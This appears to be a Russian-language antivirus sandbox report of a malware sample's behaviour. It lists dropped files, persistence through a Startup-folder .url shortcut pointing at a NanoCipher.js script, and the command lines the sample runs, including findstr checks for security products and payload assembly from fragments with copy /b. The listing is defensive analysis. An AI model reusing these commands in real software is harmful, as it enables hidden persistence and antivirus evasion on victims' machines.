Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\nanocipher.url
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\tournaments
- %TEMP%\tim
- %TEMP%\martin
- %TEMP%\yes
- %TEMP%\determined
- %TEMP%\finnish
- %TEMP%\hint
- %TEMP%\already
- %TEMP%\organizing
- %TEMP%\presentations
- %TEMP%\yes.bat
- %TEMP%\185027\spy.pif
- %TEMP%\185027\h
- %LOCALAPPDATA%\nanosec cryptographics\o
- %LOCALAPPDATA%\nanosec cryptographics\nanocipher.scr
- %LOCALAPPDATA%\nanosec cryptographics\nanocipher.js
Удаляет следующие файлы
- %TEMP%\185027\h
Сетевая активность
UDP
- DNS ASK EP#############RYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
Другое
Создает и запускает на исполнение
- '%TEMP%\185027\spy.pif' H
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c copy Yes Yes.bat & Yes.bat (со скрытым окном)
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\findstr.exe' /I "wrsa opssvc"
- '%WINDIR%\syswow64\findstr.exe' -I "avastui avgui bdservicehost nswscsvc sophoshealth"
- '%WINDIR%\syswow64\cmd.exe' /c md 185027
- '%WINDIR%\syswow64\findstr.exe' /V "venezuelalandscapesmeantposters" Tournaments
- '%WINDIR%\syswow64\cmd.exe' /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
- '%WINDIR%\syswow64\choice.exe' /d y /t 5
- '%WINDIR%\syswow64\cmd.exe' /k echo [InternetShortcut] > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="%LOCALAPPDATA%\NanoSec Cryptographics\NanoCipher.js" >> "%APPDATA%\Microsoft\Wi...
